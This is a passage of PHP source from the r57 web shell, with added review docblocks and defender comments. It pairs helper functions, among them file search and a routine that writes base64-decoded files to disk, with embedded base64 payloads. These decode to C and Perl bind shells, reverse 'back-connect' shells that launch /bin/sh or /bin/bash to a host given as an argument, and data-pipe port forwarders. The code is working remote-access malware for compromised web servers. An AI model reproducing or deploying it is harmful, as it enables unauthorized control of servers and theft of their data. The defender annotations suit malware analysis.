    echo $banner_open.$prefix.$i.$banner_close;
    return null;
}
/**
 * Print one of the FTP error banners.
 *
 * @param string $l language key, 'ru' or 'tur' (the 'ru' texts are mis-encoded on this page)
 * @param int    $n message index: 0 connect failed, 1 login failed, 2 change-dir failed
 * @return null
 */
function fe($l,$n)
{
    $messages = array(
        'ru'  => array('?? ??????? ???????????? ? ftp ???????','?????? ??????????? ?? ftp ???????','?? ??????? ???????? ?????????? ?? ftp ???????'),
        'tur' => array('Connect to ftp server failed','Login to ftp server failed','Can\'t change dir on ftp server'),
    );
    $banner_open = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>";
    $banner_close = "</b></div></font></td></tr></table>";
    echo $banner_open.$messages[$l][$n].$banner_close;
    return null;
}
/**
 * Print one of the mail status banners.
 *
 * @param string $l language key, 'ru' or 'tur' (the 'ru' texts are mis-encoded on this page)
 * @param int    $n message index: 0 sending failed, 1 mail sent
 * @return null
 */
function mr($l,$n)
{
    $messages = array(
        'ru'  => array('?? ??????? ????????? ??????','?????? ??????????'),
        'tur' => array('Can\'t send mail','Mail sent'),
    );
    $banner_open = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#396D95><font color=orange face=Verdana size=-2><div align=center><b>";
    $banner_close = "</b></div></font></td></tr></table>";
    echo $banner_open.$messages[$l][$n].$banner_close;
    return null;
}
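/**
 * Format a stat() mode word as an `ls -l` style permission string.
 *
 * The file type lives in the top four bits of the mode and has to be compared
 * as a whole value. Testing single bits one after another misreads every type
 * that shares a bit with an earlier test: a block device (0x6000) and a
 * symlink (0xA000) both contain the 0x2000 bit and would be reported as "c",
 * and a socket (0xC000) contains 0x4000 and would be reported as "d".
 *
 * @param int $mode mode bits as returned by fileperms()/stat()
 * @return string|int ten-character string such as "-rwxr-xr-x", or 0 when the
 *                    global $windows flag is set
 */
function perms($mode)
{
    // No Unix permission bits to show on Windows; callers get 0 as before.
    if (!empty($GLOBALS['windows'])) return 0;

    // Compare the whole file-type field instead of probing individual bits.
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }

    $owner = array(
        'read'    => ($mode & 00400) ? 'r' : '-',
        'write'   => ($mode & 00200) ? 'w' : '-',
        'execute' => ($mode & 00100) ? 'x' : '-',
    );
    $group = array(
        'read'    => ($mode & 00040) ? 'r' : '-',
        'write'   => ($mode & 00020) ? 'w' : '-',
        'execute' => ($mode & 00010) ? 'x' : '-',
    );
    $world = array(
        'read'    => ($mode & 00004) ? 'r' : '-',
        'write'   => ($mode & 00002) ? 'w' : '-',
        'execute' => ($mode & 00001) ? 'x' : '-',
    );

    // setuid / setgid / sticky replace the execute column; upper case means
    // the special bit is set without the matching execute bit.
    if ($mode & 0x800) $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x400) $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x200) $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';

    return $type
        . $owner['read'] . $owner['write'] . $owner['execute']
        . $group['read'] . $group['write'] . $group['execute']
        . $world['read'] . $world['write'] . $world['execute'];
}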
/**
 * Build an HTML <input> tag.
 *
 * Type, name and size are written as unquoted attributes; only the value is
 * wrapped in double quotes. Nothing is HTML-escaped.
 *
 * @param string     $type  input type attribute
 * @param string     $name  input name attribute
 * @param int|string $size  size attribute, left out when it compares equal to 0
 * @param string     $value value attribute
 * @return string the tag markup
 */
function in($type,$name,$size,$value)
{
    $size_attr = ($size != 0) ? "size=".$size." " : "";
    return "<input type=".$type." name=".$name." ".$size_attr."value=\"".$value."\">";
}
/**
 * Resolve a program name to its path by running the shell's `which` through ex().
 *
 * $pr is interpolated into the command line without any quoting.
 *
 * @param string $pr program name
 * @return string whatever ex() returned for `which $pr` (not trimmed here),
 *                or $pr itself when that result is empty
 */
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
/**
 * Write base64-decoded data to a file, truncating any existing content.
 *
 * Defender note: together with the base64 blobs assigned further down in the
 * file this looks like the routine that drops the embedded helper programs to
 * disk -- TODO confirm against the call sites, which are outside this excerpt.
 * Source or script files appearing unexpectedly in web-writable or temporary
 * directories are the artefact to hunt for.
 *
 * @param string $fname destination path
 * @param string $text  base64-encoded file content
 */
function cf($fname,$text)
{
 // "or" binds looser than "=", so $w_file receives the fopen() result and we() only reports a failure.
 $w_file=@fopen($fname,"w") or we($fname);
 if($w_file)
 {
 @fputs($w_file,@base64_decode($text));
 @fclose($w_file);
 }
}
/**
 * Build a two-cell table row: a right-aligned label cell and a left-aligned value cell.
 *
 * @param int|string $l  width of the label cell, in percent
 * @param string     $t1 label cell content (inserted as-is)
 * @param string     $t2 value cell content (inserted as-is)
 * @return string the <tr> markup
 */
function sr($l,$t1,$t2)
{
    $label_cell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $value_cell = "<td class=td1 align=left>".$t2."</td>";
    return "<tr class=tr1>".$label_cell.$value_cell."</tr>";
}
// Defined only when no view_size() exists yet.
if (!@function_exists("view_size"))
{
    /**
     * Format a byte count with a binary unit (GB, MB, KB or B).
     *
     * Scaled values are rounded to two decimals; counts below 1024 are
     * returned unscaled with a " B" suffix.
     *
     * @param int|float $size size in bytes
     * @return string e.g. "1.5 KB"
     */
    function view_size($size)
    {
        $units = array(
            array(1073741824, " GB"),
            array(1048576, " MB"),
            array(1024, " KB"),
        );
        foreach ($units as $unit) {
            if ($size >= $unit[0]) {
                return @round($size / $unit[0] * 100) / 100 . $unit[1];
            }
        }
        return $size . " B";
    }
}
/**
 * Recursively collect the paths of all files below a directory.
 *
 * NOTE(review): there is no depth limit and no check for symlink cycles, and
 * unreadable directories are skipped silently ("@" on opendir()).
 *
 * @param string $dir   directory to walk
 * @param string $types optional ";"-separated list of extensions, each
 *                      including its leading dot; empty means every file
 * @return array file paths built as $dir."/".$file
 */
  function DirFilesR($dir,$types='')
  {
    $files = Array();
    if(($handle = @opendir($dir)))
    {
      while (false !== ($file = @readdir($handle)))
      {
        if ($file != "." && $file != "..")
        {
          if(@is_dir($dir."/".$file))
            // Descend into sub-directories and append their files.
            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
          else
          {
            // Extension = everything from the last "." to the end of the name.
            // NOTE(review): for a name without a dot strrpos() returns false; what
            // $ext becomes then depends on PHP's int coercion -- confirm.
            $pos = @strrpos($file,".");
            $ext = @substr($file,$pos,@strlen($file)-$pos);
            if($types)
            {
              if(@in_array($ext,explode(';',$types)))
                $files[] = $dir."/".$file;
            }
            else
              $files[] = $dir."/".$file;
          }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
/**
 * Text search over every file below one or more directories.
 *
 * The constructor gathers the file list through DirFilesR(); SearchText()
 * then scans each file line by line and stores the matching lines with the
 * hits wrapped in highlight markup.
 *
 * NOTE(review): the constructor is a PHP 4-style one (a method named like the
 * class). PHP 8.0 no longer treats such a method as a constructor, so there
 * `new SearchResult(...)` would leave every property uninitialised.
 */
  class SearchResult
  {
    var $text;              // search words, space separated
    var $FilesToSearch;     // list of file paths to scan
    var $ResultFiles;       // file name => (1-based line number => highlighted line)
    var $FilesTotal;        // number of files in $FilesToSearch
    var $MatchesCount;      // total number of matches over all files
    // NOTE(review): typo -- the methods below use the property "FileMatchesCount", which is never declared.
    var $FileMatschesCount;
    var $TimeStart;         // getmicrotime() value taken in the constructor
    var $TimeTotal;         // seconds spent, set at the end of SearchText()
    var $titles;            // initialised to an empty array; never filled in this class
    // $dir: ";"-separated directory list; $text: search words; $filter: extension list passed to DirFilesR().
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    // Plain accessors for the result fields.
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    // Scan all files. $phrase: wrap every word in \b word boundaries; $case: 0 adds the "i" modifier.
    function SearchText($phrase=0,$case=0) {
    // The words are joined with "|" into one PCRE alternation without preg_quote(),
    // so the search text is interpreted as a regular expression.
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        // NOTE(review): "@next" is a bare constant name, not "continue"; it is only
        // evaluated when file() fails, and an undefined constant is an Error on PHP 8.
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          // Each line is trimmed and stripped of tags before matching.
          $CurString = @Trim($CurString);
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            // Wrap every hit in a coloured <SPAN>; lines are stored under 1-based numbers.
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
/**
 * Current Unix time as a float with microsecond resolution.
 *
 * microtime() without arguments returns "msec sec"; both parts are cast to
 * float and added.
 *
 * @return float seconds since the epoch
 */
function getmicrotime()
{
    $parts = @explode(" ", @microtime());
    $fraction = (float)$parts[0];
    $seconds = (float)$parts[1];
    return ($fraction + $seconds);
}
1463 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1464 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1465 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1466 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1467 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1468 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1469 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1470 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1471 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1472 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1473 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1474 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1475 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1476 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1477 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1478 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1479 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1480 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1481 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1482 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1483 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1484 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1485 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1486 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1487 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1488 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1489 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1490 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1491 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1492 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1493 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1494 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1495 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1496 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1497 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1498 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1499 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1500 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1501 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1502 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1503 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1504 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1505 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1506 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1507 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1508 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1509 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1510 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1511 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1512 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1513 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1514 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1515 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1516 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1517 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1518 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1519 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1520 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1521 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1522 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1523 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1524 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1525 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1526 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1527 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1528 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1529 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1530 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1531 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1532 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1533 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1534 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1535 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1536 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1537 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
1538 CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
1539 bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
1540 gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
1541 NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
1542 iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
1543 aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
1544 SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
1545 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
1546 WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
1547 CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
1548 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
1549 I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
1550 m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
